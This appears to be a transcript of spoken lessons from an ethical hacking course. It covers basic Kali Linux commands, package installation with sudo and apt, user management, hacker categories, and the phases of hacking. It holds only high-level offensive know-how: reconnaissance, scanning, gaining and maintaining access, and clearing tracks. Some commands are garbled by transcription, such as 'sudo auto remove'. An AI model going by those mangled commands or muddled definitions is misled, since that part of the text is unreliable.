rm command. Right. The next one is sort the content of the text file. Sort command is used to sort the content of a text file line by line. So you just now we have created one file sample.txt. Once again we'll go with the content sample.txt. So there are 3 lines. Hello friends, welcome to basic Kali Linux commands and thank you. Now apply the sort sample.txt so that the content will be sorted line by line. So you can observe here. See, among this one, h is having the smallest value. So h, it starts with a hello friends, and among these two, w and t. So t comes before w. So thank you and welcome to basic Kali Linux commands. Right. Again, once go through the content of sample.txt. The data will not be, the data will not be modified. So this is only the temporary output sort. That means it will display the output after sorting the content according to the line by line. Right. So the original content will not be changed. The file will be containing the same content. It will not be modified. So only the output will be printed on the screen itself. Right. That's a sort. Next, uptime. So uptime is used to display the amount of time the system has been running. So my system is being running from around 4 o'clock. So it will display the time. So if I go uptime, it will display the amount of time the system has been running. See, let us check uptime. So it is about 8 hours 10 minutes. Right. So and only one user is using this one. So it will give this complete system time from when it is being running. Right. And the next one is users. It will display the login names of users who are logged in onto the system. Login names. It will display the login names. So users will display the login names. So Kali is the login name which was already logged in. And the VI, just now we have seen, it's a screen editor and we can use this VI to create a files or edit the files. And the next free command is used to display the information about the amount of RAM available in the Linux machine. The complete data, the free space available in the machine, the free memory. Right. So about the buffer or a cache memory. So total memory which was being used and which is available still and which is about shared and what is the buffer cache and what is available. So everything will be displayed here regarding the memory usage. The memory allocation. So what is a user memory and what is a free memory, available memory, about the available memory. Right. Next, history, the name itself indicates it will display the current user's history on the screen. So whatever the commands which we are used here, everything will be displayed here. History. You can see all these are the commands which I have used so far. So we'll get the complete history. So it will be maintained. The log will be maintained, and by using the history command, we'll get this thing. And PWD, it gives the working directory. It prints the working directory. So you can observe here PWD. So it gives a current working directory. So now we are working in Kali. So if you change your directory to one more directory, so which we have created, Sundeep Saradhi, now you can see PWD, which will give the path, complete path. That means where we are working. So now we are working in Sundeep, which is available in Kali and which is available in home. So PWD will give the present working directory or a print working directory, anything. And the move or rename. So we can move a file from one position to another position. So let us take here ls. So we'll move mv demo.txt to, so we can go with a home curly. So we are moving the file, okay, we are moving the file demo.txt from Sundeep Saradhi folder to Kali folder. Now you can observe ls. So it's an empty folder because there is only one file created in Sundeep_Saradhi directory, and now we have moved that demo.txt from Sundeep_Saradhi directory to Kali. So let us move on to the Kali and give ls. Here you can see a demo.txt, and now we will see move sample.txt to home Kali Sundeep_Saradhi. So source and destination. So now you can see ls. Here you will not be having the sample.txt. If you change your directory to Sundeep_Saradhi, you will be finding this one. And if you are not giving any path, okay, just we can rename. See, I will give mv sample.txt to demo.txt. So obviously it will be renamed to demo.txt. Okay, we are not giving path. Both the source is a file name, destination is a file name. So if both the source and destination are the file names, that gives the rename option. So simply you can see cat demo.txt, again it will give the same content, and again see cat sample.txt, which will give an error because there is no file, and again I will rename demo.txt to sample.txt so that it will be renamed and list. So you will be getting the sample.txt. So mv command is used to move the file from one location to another location, or we can also rename the file. And similarly copy. So cp command is used to copy the file from one location to another location, so that the file will be available in both the locations. But mv command, if you use a mv command, the file will be moved from one location to another location, so the file will be available in only one location. But cp is a copy. So a copy of a file will be created and it will be located in another location. It will be available in the another location. See, now you can observe. So here in the Sundeep_Saradhi folder, we are having one file called sample.txt, and we'll move on with Kali and go with ls. So here we are not having the sample.txt. So I'll copy the same thing. See, cd Sundeep_Saradhi. Let me copy that thing, cp sample.txt, which is available here itself, to home Kali, right? So enter. So now you can observe in this Sundeep_Saradhi we are having sample.txt, and move on with the Kali and go with ls. Here also you will be having the sample.txt. So both the folders, both the locations, we are having the sample.txt. So that doesn't happen with the mv command. Mv command means that it will move the file from one location to another location, so there will be no copy created. But here a copy will be created and it will be placed in the given location. So both the locations will be having the file. So that is a copy, cp. And touch command we have seen just now. Touch is used to create an empty file. So it will create an empty file, right? And the next ifconfig. So ifconfig is used to display the complete network details, the subnet mask, IP address, etc., etc. It will display. So see ifconfig, not ipconfig. It's a ifconfig. So it will display the IP address, masking, net mask, subnet mask, etc., etc. Everything will be displayed. Come with the network related details. It will display the network related details, right? And the next one is a sudo. The sudo command is used to install or remove any or upgrade any package. So if you want to install the wheel framework, in the previous session we have discussed about the wheel framework. Okay, already we have I have recorded the video, demonstrating the installation of wheel framework. So sudo apt get install wheel. So it will prompt for the password, so it will not display here, just type it and press enter. So automatically it will start executing this one, it will start installing the wheel. Okay, whatever the framework, I am just showing the framework, whatever the framework or a package or a module, you need to use a sudo command to install that one. Sudo apt -get install package name. And if you want to remove, so for that also you can use a command called sudo auto remove. So I don't want to remove the wheel framework here now, so just use a command, the same thing, sudo auto remove wheel. Sudo apt, or simply remove wheel. See, do you want to continue? So this is a command apt get remove wheel. So this is a command which is used to remove the package. So now I don't want to remove this one. So it was the process was aborted. So the next one, so that is a sudo. So it will be overview. So if you want to install or remove or upgrade, whatever it may be, you have to use a sudo. And sudo su, it will migrate the current user to the root user. So now the user is a Kali. If you want to work with a root user, simply like admin. Okay, admin. So just use a command called sudo su. So it will redirect to the root user. So you can observe here, it's a root. So similar to our admin privileges. So use a exit command to get out from the root. These two are very important, sudo and sudo su. And a clear is used to clear the complete screen. So here we are having a lot of content displayed. So if you use a clear command, automatically it will clear the screen. Right? So it will completely clear all the previous data. And the next one comes with a man. So it is also very useful because it will give the user manual for all the commands. So whatever the command, if you want to know, so use a man, that means a manual. Man stands for a manual, right? So man followed by calendar. So it will give the complete details about that particular command, right? So see here, continue. If you press enter, it will continue displaying the complete thing. And these are all different options. All the different options we can use with the calendar command, right? So if you go with the Q, it will quit. Similarly, man, and if you want to know about the cat command, use a cat. So it will give the complete manual of a cat command, how it can be used, right? The complete syntax as well as the options which are available, which we can use with the cat, right? So quit. So that is most important. Man stands for a manual. This is a user manual for all the commands. And the next one is a tree. Tree command, the name itself indicates it displays the list of contents from a directory in the tree function in a tree fashion. See. Now go with the ls. So we are having some sort of some are files, some are the directories, and in that directory also we are having some files, because you can see we have already created one directory called Sundeep Saradhi. You can see cd Sundeep _ Saradhi, and here ls we are having again a file. So similarly we are having one more folder called KLinux, and this is also one folder, and here also we are having a lot of files here, right? But if you want to display everything in a tree fashion, use a command called a tree. So you can observe here, this is a tree fashion. Okay, this is a complete tree fashion. You can observe here, right? Okay, so starting from the root, it will create the complete tree fashion. So see, I will explain you. So go to the KLinex user command tree. So here you can see in the tree there is a one more folder called ethical hacking. In that folder we are having sample file, and similarly some nano file is there, sample file is there, Sundeep file is there, tester.py file is there. So there are having 4 files and one folder, and again one folder is having one file. So this is a tree structure. Okay, this is of KLinex. Right? So hope you understood this one. Tree structure. The complete details will be displayed in a tree structure. And a WC command is used to display the number of lines, words, characters, and the bytes. Right? So it will display the complete file. So now we'll see ls. We are having sample.txt. Let us check cat sample.txt. So 3 lines are there. So use a WC command. So WC sample.txt. So it will give the 3 lines and 10 words and 61 characters. 3 lines, 10 words and 61 characters. So like this we can get the complete word count and a character count and a line count by using the WC. And also there is a one more function called a difference, which will display the difference between 2 files. So we can get the difference between two files. So let me create one more file. So vi demo.txt. I think there is a, yes, this is an empty file. So let us create here. So I'll go with a hello friends. Welcome to Kali Linux basic commands. So I'll just stop. I'll save it. Now you can see cat sample.txt, the information, cat demo.txt, the information. So both are having the similar things except a thank you. So sample.txt having 2 lines and 2 lines of common lines which are available in demo.txt also. Now you can observe diff sample.txt and demo.txt. See, the 2 lines are common, so it was displayed in a red. See here we are having, yes, 2 lines, 2 differences, because here we are having basic Kali Linux commands, and here we have written Kali Linux basic commands. So both are different. Yes, that's my mistake. So here the 2 differences, 2 lines are a difference. So we got a 2 lines as a difference. And hello friends is a common thing. Hello friends is a common thing. So one file we are having a 2 lines, and another file we are having only 1 line. So that's a display. So in the sample.txt, these are the lines we are having which are not available in demo.txt, and this is the one thing which is not available in sample.txt. So both the things have displayed here. So it gives the difference between 2 different files. It will show the difference between 2 different files. And next one is a sleep command. It will wait until the given seconds, right? So it will delay for a specified time in terms of seconds. See, let us check. Sleep, I will give 5. So after 5 seconds, you will get the terminal again, a prompt again. Yes. So once again, so let us check. Sleep 3. So 1, 2, 3. So after 3 seconds, again we'll get the prompt. That means the terminal will be in a sleep mode for a given number of seconds. Okay, and the next one is a reboot. Reboot the OS will automatically reboots. See, reboot. So obviously, what happens? The Kali Linux has been restarted. So by using the reboot command also we can start the Kali Linux. So hope you understood all the commands. So it may take some time to start the Kali Linux. So meanwhile, subscribe to our channel and support our channel. So yes, we got a login page. So I'm going with Kali. So we are getting the home page. Again, we are just open the terminal. So that is a reboot option. And in order to shut down the Kali Linux, we can use a shutdown now. Shutdown now will shut down now. So obviously the Kali Linux will be powered off, right? See, you can observe here the state is powered off. So shutdown now command is used to shut down the Kali Linux, right? So these are the different basic commands which will be used in our Kali Linux. Definitely we are going to use a few commands in our further sessions. In today's session, we'll discuss about how to install any tools or packages in Kali Linux, and similarly how to remove the tools or packages in Kali Linux. So first let us open the Kali Linux. So I'm going with the virtual machine. So here I will give the username and password to enter into the Kali Linux. So once we got the terminal, so I'll tell you the command and see. So the command to install tools or packages in Kali Linux is, so in the prompt just give sudo, which is nothing but a super user, eapt get, which is nothing but advanced packing toolkit, and from that we are getting the tool install and tool name. So this command will install a particular tool in the Kali Linux. Similarly, removing tools or packages in Kali Linux. So how can we install or remove the existing tools? So for that also just go with the command sudo, that is a super user do, and apt and auto remove. The command is auto remove and followed by the tool name. So this is a command which is used to remove the tools or packages which are available in Kali Linux. Now let us install one tool called Wireshark. So it is a tool which is used to capture network traffic. So whatever that network traffic is available, so from the Ethernet, so obviously from the Ethernet or wireless or Bluetooth, etc., Bluetooth, right? So we'll discuss more regarding this Wireshark in our further sessions. Leave it. Now this is one tool which is available in the Kali Linux, and now we'll see how to install this Wireshark in our Kali Linux by using these commands. So now I will show you the installation and as well as the removing of this particular Wireshark. So go to the Kali Linux. So there is a terminal here. So first let us type this Wireshark, whether it is available in the Kali Linux or not. So there is not available. See, command Wireshark not found, but can be installed with a sudo apt install Wireshark -qt. So do you want to install? Just go with the no. Now use a command. What is the command to install the Kali tools in the Kali Linux? Sudo apt get install tool name. So use that one, sudo apt get install tool name. So tool name is Wireshark. So it will prompt for the password. Just type the password. It will not be visible on the screen. No need to worry. Just go with the password. Just type the password and press enter. So automatically it will start installing the particular tool. You can observe here, after this operation 12.1 MB of additional disk space will be used. So do you want to continue or not? So if you press here Y, it will be continued. If you press here N, it will not be continued, right? It will be aborted. So just I will go with the Y, so it will continue. So you can observe the installation process is going on. So once it was done, so we'll use a command Wireshark, so and we can find whether it has been installed or not. So it may take some time. So meanwhile, so subscribe to our channel and follow our videos. So hope you can see it was almost done. Just a 3% is left. Yes. So everything is being done automatically. So you can just sit and relax until the installation process is completed. See, so we got a prompt that implies the process has been completed, right? Now we can check. So I'll go with the clear command. It will clear the screen. Now we can simply type here the Wireshark, the tool name, and press enter. Automatically the tool will be opened. So you can observe this is a Wireshark network analyzer, right? So we can check the network traffic either from a Bluetooth or Ethernet or any other wireless system or any other thing, right? So here you can see the options: Bluetooth, Ethernet, any, like that. You have to select and you have to execute. So just leave it. So we'll discuss in our next sessions. So this is about installation of Wireshark. Now our system, our Kali Linux is having the tool Wireshark. Now I just want to remove this Wireshark. So in order to remove this Wireshark or any other tool, the command is sudo apt auto remove tool name. So just go with the same command. So sudo apt auto remove tool name. That is a Wireshark. Just now we have installed. So just press enter. Automatically it will start removing the thing. See, after this operation, 12.2 MB disk space will be freed because everything related to that particular tool will be get deleted. So do you wish to continue? If you press Y, it will be continued. That means it will start removing the tool from the Kali Linux. And if you press N, the process will be aborted and the tool will be remain same. So I'll go with a Y because we need to remove that one. So Y, yes, and press enter. See, automatically the process will be started and it will be removed from our Kali Linux. So it will be very fast when compared to installation. So the complete process has been done. Now the Wireshark tool is not available in our Kali Linux. So you can observe, you can check. So go with the again Wireshark. See, again we are getting the command Wireshark not found, but can be installed with the sudo apt install Wireshark -qt. Do you want to install it? If you press Y, again the installation process will start. I'm going with the N, so it will be aborted. So this is how we can install and remove any tools or any packages in a Kali Linux. And this is a very important because our Kali Linux will be supporting a lot of tools as we have discussed in the further session, in the previous session, right? So why the ethical hackers or the hackers will choose this Kali Linux means it will support around hundreds of tools. So in order to hack the system or anything else, right, in the hacking process. So that's why. So this is very important, because if any tool is not available, so how to install that particular tool is very important, right? So once again, these are the two commands to install the tool or to remove the tool. So in our next further sessions, I'll give the complete information about this sudo apt get. So what is meant by this sudo, what is meant by this apt, what is meant by this get, everything we'll discuss in our further session.
So in today's session, we'll discuss about one important command in Kali Linux, that is sudo command. So we can use this sudo command in many ways. So we'll see the importance of this sudo command. So this sudo stands for super user do. Super user do. And this is a command used to execute commands either as a root user or another user. So we know that in Linux, root is a administrator, right? So in our normal systems, if you want to install or remove any softwares, you should be logged in with an administrator. So then only we can able to install a few softwares. Similarly, if you want to execute some commands, you need to execute the commands with the help of a root user. So here in Linux, we are having a one command, that is a sudo, which is not a root, but we can execute the commands either as a root user or another user, right? So that means the administrative privileges will be done for the current user, right? So this root, so root is an administrator. Root is an administrator, and in order to execute any commands with the administrative privileges, then we have to go with the sudo. So whatever the users which can be executed by using, which can execute with the administrative rules, will be called as sudoers. So these are the group of users. These are the group of users who can execute commands So sudoers are the group of users who can execute the commands in an administrative role. So we need not log in with the administrator, but the current user can execute the commands with the administrative privileges. So that we call it as a sudo. And there is a command called sudo su. Sudo su is a command to switch from one user to another user, and execute commands without logging out. So for example, if in our normal systems, if you are there are two users, and if one user is logged in, and if you want to install some softwares, so obviously we have to log out from the current user and we have to log in with the administrator, and then we can install the softwares. Similarly here, sudo su is a command which is used to switch from one user to another user. That means if one user is in a login already logged in, then without logging out from that user, we can switch from one user to another user to execute the commands in administrative role. So that is a sudo su. Sudo su. So the another user may be root also. The another user may be root also, right? And the next one, this sudo command is also used to install or remove the packages in Kali Linux. So in our previous sessions, so we have discussed about this one. So that means the Kali Linux, why the hackers will choose this Kali Linux. So because this Kali Linux will support around hundreds of tools in order to hack the system, right? So those tools can be installed by using this sudo command. So we'll see that command. So what is a command to install and what is a command to remove the tools? So this sudo command is used to execute commands in administrative role. Admin role, that is the one thing. Second one, install or switch from one user to another user. One user to another user. And the next one, to install tools or packages. So what is the command for installing the tools or packages? So this is a prompt. So sudo apt get tool name. Now we need to see what is this apt and get. So we know that sudo is a command which is used to execute the commands in administrative role, right? So apt and get. So this apt is nothing but advanced packing tool, so which consists of all tools or packages which are compatible with this particular Kali Linux. So all the tools will be available in this advanced packing tool, which is apt. And this get command, so this is a apt, and get command to get that particular tool from apt. So from this advanced packing tool, in order to retrieve this particular tool, we have to use a command called get. So this apt-get means getting the tool, the required tool from the advanced packing tool. So, and obviously the next one is not a tool name, it's an install. So we need to install tool name. So whatever the tool we are giving here, that will be retrieved from the apt and it will be installed in our environment. So this is the importance of sudo apt get install tool name. So the third one, to install the tools and packages. And the next one, to remove tools or packages. So obviously if you are installing the tool, so we can also remove the tool from the environment. So in order to remove the tool, so the command is sudo auto remove tool name. Sudo auto remove tool name. So this auto remove will remove the tool from environment. Automatically it will remove the uninstall. We can say it as an uninstall. It will uninstall the complete tool from the environment, right? So this is the command. And there is a one more thing. So why we can use the sudo means, so we can also upgrade the tools. So all the tools are available in apt. Okay, so apt, here we are having all the tools. So we can update these tools. In order to update these tools, we can go with the upgrade. So the syntax is sudo apt get upgrade. So this upgrade will download and install all the updates which are available for the tools. Or packages. So in this apt we are having the tools, and if these tools are beyond the update, so we can download and install all the updates which are available for the tools by using this command, upgrade command. And it is suggestible that just upgrade a tool before installing that particular tool. That means if you want to install a particular tool or a package, first upgrade it and then install it. Okay, so that if there are any updates available for the tool, that will be done by using this one. And here by using the sudo command, we can also add a new users. Okay, we can also add a new users, right? So simply we can use a sudo add user, sudo add user, sudo add user username. So this will automatically create one user. Okay, it will create one user, and make sure that this user doesn't belongs to a sudoer. Okay, this user is a normal user. This user doesn't belongs to the sudoer. So that means we can't execute the commands in administrative roles for this particular user. So in order to execute the commands in administrative role for this particular user, we need to add this username to this group, sudoer group, right? So in order to add a user, also we can use this sudo command. So hope you understood this sudo command, very important in the Linux. So in order to execute the commands or to switch from one user to another user, and to install, mainly in order to install the tools and packages, and also to remove and upgrade. So for all these things we're going to use this sudo. So once execute these commands in your Kali Linux, so that you will be understand.
So in today's session we will discuss about how to add a new user in the Kali Linux and how to remove the user from the Kali Linux. So in the previous session we have discussed about how to install the Kali Linux in the virtual machine, and also we have seen the importance of sudo command. So because the sudo command will be used to create a new user, and after creating a new user we have to change the privileges of that particular user. That means we have to add that particular new user to the sudoers group, because sudoers are the group of users who can execute the commands as a root or administrator. If you want to execute any command, so that can be done as an administrator only for the users who are available in that particular sudoers group. So in this session we'll see how to create a user and how to add the user into the sudoers group, right? And also how to remove the users from the Kali Linux. So just go to the command prompt, terminal. So now we are in the Kali environment, so Kali Linux and Kali login, right? Kali login. Now in order to find out the users, all the users will be available in the folder etc, right? So just to change the directory to etc, so go to the ls command, give the ls command, so to list out all the files available. So here you can find the password. So just display the information of this particular file so that we'll get all the users available in our Kali environment. So in order to check the content of this particular file, we have to use a command called cat PASWD. So here you can see, yes, Sundeep is one user, Kali is one user. So all these are the different users available in this Kali environment. Now we'll see how to create a user, right? So sudo is a command which can be used to create a user. So here the syntax for adding the user is sudo add user. I'll go with my name, or yeah, Saradhi, right? So this will add one user. See, it will prompt for the password. So here the sudo is a command which executes the commands given as an administrator, right? So here it will prompt for the password. I'll give the password for Kali. So don't worry, that password which you have typed in the keyboard will not be displayed on the screen in the Linux environment, but still type correctly and press enter. So you can observe here, adding user Saradhi, adding new group, adding new user Saradhi with a group so and so, and it was asking for the password. So give the password. So again, if you type the password, it will not be displayed on the screen, but still don't worry. So type the password carefully and press enter. It will prompt for retyping a new password. So again, repeat the same password, press enter. So password updated successfully. So one user Saradhi is created with a given password, and see again it was asking for a few information to update the profile. So I'll give the information, full name and room number. Let it be 1021. So whatever it may be. So work phone number. Okay, I'll give some other any random numbers. So any other, no, just press enter. So is the information correct? If you press Y and press enter, automatically this will be saved in your profile, right? And if you press no, that means N, it will not be saved. So I'll go with the Y and press enter. So automatically we got a prompt. So that implies, so the command was executed successfully without any errors. That means the user has been added now. So let us check whether the user is added or not. So what we have to do, so you go to the etc cd etc and cat password. See, here you can find the username Saradhi. So the user has been added. Now we have added the user, right? But we have not given the privileges, administrator privileges. That means we have to add the user into sudoers group, right? So the sudoers group members can only execute the commands as a root or administrator. So in order to change the user, so in the previous session we have seen the sudo command, the importance of sudo command. So there we have seen one command called sudo su, which can switch from one user to another user without logging out from the current user. So here the current user is Kali, and I'm not logging out from the Kali, but I'm just entering into my new user. So here you can observe, so previously Kali, and here you can observe Saradhi and Kali. And here let us try to install any software, so which is sudo apt get and install Wireshark. So it will prompt for the password. Just give the password, press enter. So you can observe here Saradhi is not in the sudoers file. That means the tools or packages can be installed only with the help of privileges of administrator. That means we have to add the user to the sudoers group, then only we can work with the sudo command here. So in order to add this particular user to the sudoers group, go to the root. So just give the exit from this particular current user, right? Go to the root. So in order to go to the root, just type sudo su. So automatically it will go to the root, and here you can give sudo -a, sorry. So just wait. So let us come with the Kali. So here, yeah, no problem. In root or Kali, no problem. So use the command sudo user mod -a. -a is for appending and -G is for a group, appending this particular user to the group. So which user, just give here the username. So we are adding this particular Saradhi into a group. That means A means appending. So sudo mod means user mod means changing the operations. So user modification, simply we can say. So press enter, automatically it will be given permission to the sudo, right? Now let us check. Let us move on to that particular user, sudo su Saradhi, and here you can now apply sudo try to install any application, sudo apt-get install Wireshark. See, it will prompt for the password, give password. See, it was started installing this one, right? So that means previously it was not added to the sudoers, so that's why. So we can't apply the sudo command. So just give n, right? So this is how we can create a user, add a new user, and add the new user to the sudoers group, right? Now, how to remove the user? So just now we have seen. So let us move on to the thing. Let us check out the users. So I'll come out from this Saradhi login. So cd -etc and cat password. So here you can see the users Saradhi. Now I just want to remove this particular user. Okay, so for that just go to the root command sudo su and use a command called user delete and give the name of the user which you want to delete. So obviously it will be deleted. Now it was deleted, right? Let us check. See, Sundeep is the last user. Saradhi has been deleted. So here this is a user, right? This is a user, and there is no other user after the Sundeep. But previously we had that particular user Saradhi, right? So this is a command which is used to delete the user. So first we have to enter into the root and then we have to delete the users. So this is a small session to add and delete the new users in the Kali Linux.
So in today's session, we'll discuss about one more topic in ethical hacking, that is the types of hackers. So in our previous sessions, we have discussed about what is a hacking and who we call it as a hackers. So hacker is a person who gains the access unauthorizedly is known as a hacker. And here these hackers are classified into different categories based upon their intention of work. So majorly these hackers are classified as white hat hackers, then black hat hackers, grey hat hackers, and these are the major categories of hackers. And apart from these three, there are three more categories: red hat hackers, blue and then green hat hackers. So these are the different categories the hackers were classified, so based upon their intention of work. So in all the cases the access will be done unauthorizedly, but based upon their intention, so these categories were classified. Now we'll see one by one. Okay, so first let us start with the white hat hackers. So these hackers are experts in cybersecurity, and these are, the intention is good intention. So they'll do the work in a good intention. So that means they'll do the process for testing purpose.
testing purpose. That means to find vulnerabilities, to find vulnerabilities, to find vulnerabilities. And also these are all certified hackers, certified hackers, and this is a legal, and these are also called as ethical hackers, ethical hacker. So a hacker is completely different from ethical hacker. So gaining the access of a target system with the permission of organizational head in order to find the vulnerabilities, right? So it's called as a white hat hacker. So these are all the properties of this white hat hacker. That means these are all the work done by the white hat hackers, right? So expert in cyber security, intention is very good. So in order to find the vulnerabilities, that means the testing purpose. So, and certified hackers, these are all certified hackers, and legal and ethical hackers. These are also known as the ethical hackers. And coming to the second category, that is a black hat hackers. Black hat hackers. So these black hat hackers are also experts in cyber security, but the intention was bad intention. The intention was bad intention. So this is not for testing purpose. So gain the access and may destroy the system. May destroy the system. So they may access the data, they will steal the data, or they may destroy the complete system. And so there is no chance of finding the vulnerabilities. So just with the bad intention, and this is not certified hackers, and these are all illegal work. Okay, these are done by these are comes under the illegal work. Okay, so unauthorized access, unauthorized access, and danger. These hackers are danger because they'll gain the access of our system, and they will steal our data, personal data or financial data, or they may destroy the complete system, right? So these are called as a black hat hackers. So that is a major difference between white and black hat hackers. The next one is gray hat. Gray hat. So we know that the gray color means the combination of black and white. So there is also experts in cyber security. The intention will be bad or good. Bad or good. So some hackers may be good intention, some hackers may be having the bad intention. And gain the access may destroy the system or for their personal gain. For their personal gain. So they will charge some financial amount in order to release the data. And this is also illegal. They will also do the unauthorized access. These may not be danger. This may not be a danger. So one thing difference from black hat and white hat is they will gain the access for their personal gain. Okay, they will expect something. So these are called as a gray hat hackers. So these are the three major classification of hackers: black, white, and gray. And the next one is red hat hackers. So just now we have seen what are the black hat hackers. So in order to take down these black hat hackers, these red hat hackers will attack the black hat hackers. So see, these hackers attack black hat hackers. Black hat hackers. And this is also illegal work, and they will use hacking tools to take down
black hat hackers, to bring down the black hat hackers. So the target of these red hat hackers are the black hat hackers. So the main target is black hat hackers. To take down these black hat hackers, the red hat hackers will work. And the next category is blue hat hackers. Blue hat hackers. And these blue hat hackers are the working professionals. They will be hired by the company to find the vulnerabilities of any software which is being released. That means with a prior to release the software, to find the vulnerabilities of a software, the company will hire these blue hat hackers. So these are called as a working professionals. These are the working professionals. See, the blue hat hackers are the working professionals So they work to identify vulnerabilities of a new software which is being released. That means the software, before releasing a new software, so the company will hire these blue hat hackers to find if there are any vulnerabilities for this particular software or not. So these type of hackers, we call it as a blue hat hackers. And the last category, it's a green hat hackers. And these green hat hackers are the new hackers. They are in the learning phase. So these are the hackers who are in the learning phase, right? So hackers in learning phase. So these hackers doesn't know how to fix it. Okay, they doesn't know the impact for their actions. So if they want to access the target system unauthorizedly, they doesn't know what are the consequences, what is the impact done, and they doesn't know how to fix them. So they also don't know how to fix them. Also don't know how to fix them. So these are the learning phase. These are the hackers who are in the learning phase. So these types of hackers are known as green hat hackers, right? So hope you understood. These are the major categories of hackers. So black hat, white hat, gray hat, red, blue, and green hat hackers. So in today's session, we'll discuss about the different types of hacking. So in our previous sessions, we have discussed about the hacking and ethical hacking. So we have discussed that hacking means getting the unauthorized access, and ethical hacking means legally getting the unauthorized access. It's called ethical hacking. Now we'll see different types of hacking. So coming to the first one, it's a computer hacking. So computer hacking means gaining unauthorized access, by getting user ID and passwords. So by stealing this user ID and password, gaining the access of a computer will comes under this computer hacking, right? So for every computer, so we'll give some access. That means we'll give some accounts, user accounts. So the hacker will get those user IDs and passwords, and by using them, he or she will gain the access of a computer. And the second one, network hacking. So here the name itself indicates accessing the network. That means they will collect the information about the network. So here, in order to collect the information information about the network, they'll use a different tools. There will be different tools available, right? So here hacking means the first one, gathering information about network. So how this information will be gathered means they will use tools, different tools like Nmap, NetSat, Telnet, etc. There are a lot of tools available to gather the information. So once the information is gathered from the network, automatically the hacker will gain the access of a computer. So that type of hacking, we call it as a network hacking. So gathering the information about the network by using a lot of tools. Next one, password hacking. Password hacking means, so unauthorized access, that means finding the passwords. Simply we can say it as a recovering the passwords, right? So here the hacker will recover the passwords. Recovering the passwords, and this will be done from the data stored in our computer. So they will recover the passwords, that means they will find out the forgotten passwords, right? So that process we call it as a password hacking. Password hacking, right? Next, email hacking. Email hacking. So email hacking means gaining the access of email accounts, right? So gaining the access of email accounts. So without interfering with the owner of the email, right? So gaining the access of email accounts comes under this email hacking. And the next one, website hacking. Website hacking. So here gaining the access of all the web services. That means here coming to the gaining access of web servers, because in the servers itself we are maintaining the web pages, and similarly backend will also maintain some database in the web server. So databases and other relevant interfaces, any other related interfaces, the gaining the access of those things also comes under this website hacking. And other interfaces. So all these are unauthorized access. Okay, so here we are talking about the gaining the access, that means unauthorizedly, right? So this is called a website hacking. So whatever the related to the website, that means the servers, databases and any other related interfaces will be gained by the hacker. It's known as a website hacking. And finally, ethical hacking. Ethical hacking, we already discussed about this ethical hacking. So gaining the access without getting the permission of the, with the permission of the institution or organizational head, that we call it as a legal, right? So that's why we call it as a ethical hacking. So gaining, or simply we can say unauthorized access. Unauthorized access with permission from institutional or organizational head. Right? So that we call it as a ethical hacking. So this already we have discussed in the introductory part. Right? So these are the different types of hackings available. Okay, so the computer hacking, network hacking, and password hacking, email hacking, website hacking, and ethical hacking. So in today's session, we'll discuss about one more topic in ethical hacking, that is phases of ethical hacking. So phases of hacking or ethical hacking. So totally the 6 phases are there. The hacker have to follow all the 6 phases. The first one is reconnaissance. Usually we call it as a recon stage. Scanning phase. Gaining access and maintaining the access. Clearing tracks. So usually these are the 5 phases involved in the hacking, and one more stage comes with the ethical hacking, that is reports. So phases, that means the hacker should follow all the phases, right? So 5 phases for a hacking and total 6 phases for ethical hacking. So the first 5 phases are for hacking, the normal hacking, and complete 6 phases are for ethical hacking. Right? So reconnaissance, or we can simply call it as a recon, scanning, gaining the access, maintaining the access, clearing tracks, and finally reports. Right? So first let us see about the hacking, and then we'll see the ethical hacking. So finally we'll see this report. First let's move on with the hacking. So first, what is the first phase? That's the recon phase. The first phase of hacking or ethical hacking is recon phase. So this recon phase, so as usual, this is a first phase of hacking, and this is also called as, also known as footprinting or information gathering phase. Information gathering. So here the name itself indicates, in this phase the hacker will gather the information as much as possible of a target system, right? So the hacker gathers the information as much as possible. So every minute information is also being recorded in this phase, right? And mainly the hacker gathers the information regarding 3 groups. The first one, the people who involved in the organization. So people involved. Host, so on which system we need to attack? The host.
and finally network regarding the routers, firewalls, etc., configuration, network configuration, right? So the information regarding all these things will be gathered by the hacker in this particular reconnaissance phase. That means the information gathering phase, and this is also called as a footprinting, and this is again classified as the two categories, that is a active footprint and passive footprint. So I'll write here. See, active footprint. Usually the footprinting means information gathering. So active footprint means the hacker directly interacts with the target system, and gathers the information. So in order to gather the information, the hacker will directly contact or interact with the target. So that type of gathering information, we call it as an active footprinting. And the next one, passive footprinting. So in this passive footprinting, hacker will indirectly interact with the target. So actually, in order to gather the information, there are a lot of automated tools, right? So by using those tools, the hacker will gather the information of a target system, right? Mainly the three groups: people, host, and the network. So that is the first phase of a hacking or ethical hacking, whatever it may be. So coming to the after gathering the information, so the second phase is a scanning. Second phase comes with the scanning. So whatever the information gathered in the first phase, by using that information, the hacker will start scanning for the vulnerabilities, right? So the second phase is a scanning. So obviously this is a second phase, and whatever the information gathered in the first phase, so the hacker will take that as an input, and the hacker will start finding the vulnerabilities, start scanning the vulnerabilities, right? So here the attacker or a hacker starts scanning vulnerabilities or a weakness of a system or a network or a machine, whatever it may be, right? So with the help of information gathered in phase 1, in the first phase. So whatever the information gathered in the first phase, that will be, with the help of that information, attacker will start scanning the vulnerabilities, that means finding the vulnerabilities. And here mainly there are three types of scannings done, right? So first one is port scanning. So here the attacker scan the target system, for available ports, right? So whatever the ports which are available in a free, so those ports, so it will find the ports, because through the ports the attacker will exploit the payloads, right? Next, vulnerability scanning. So here the attacker scan
the target to find the weakness. So wherever the weakness is available, so the attacker will make use of those vulnerabilities to enter into the system, right? Then the next one, network scanning. And this network scanning, here the attacker scan the target to find the information regarding, to find the network firewalls, okay, etc. Regarding the network information. So regarding the network information, the attacker will scan the target. That is a network scanning. So here in the scanning phase, there are three types of scanning: support, vulnerability, and the network. So after this phase, the attacker will be having the information gathered from the first phase, as well as what are the available ports, what are the vulnerabilities, weakness, and what are the firewalls configured in the firewalls or any other security systems configured in the target. So everything is now available with the attacker. Then coming to the third phase, gaining the access. So here the actual work will be done. So once the information is available, now the hacker will start gaining the access of a target, right? So that's why the third phase is gaining access. So here the attacker makes use of information gathered from phase 1 and 2, phase 1 and 2, to gain access of a target. So now in order to gain the access of a target, the hacker will make use of the information gathered in phase 1 and phase 2. Right? So here the actual attacks will be done. So once the vulnerability is found, automatically the payload will be sent and automatically the control will be taken by the attacker. So here the attacks will be done. Attacks will be performed. And here the attacks can be the phishing attacks, denial of service attacks, okay, web attacks, website attacks, etc. Whatever the attacks may be, so that will be performed and the hacker or an attacker will gain the access of a target. So that is done here. Now once the attacker gains the access of a target, is the work completed? Obviously there is no, because so the attacker have to maintain that access for further exploitations, for sending more number of attacks, or until the attacker completes all the activities, right? So 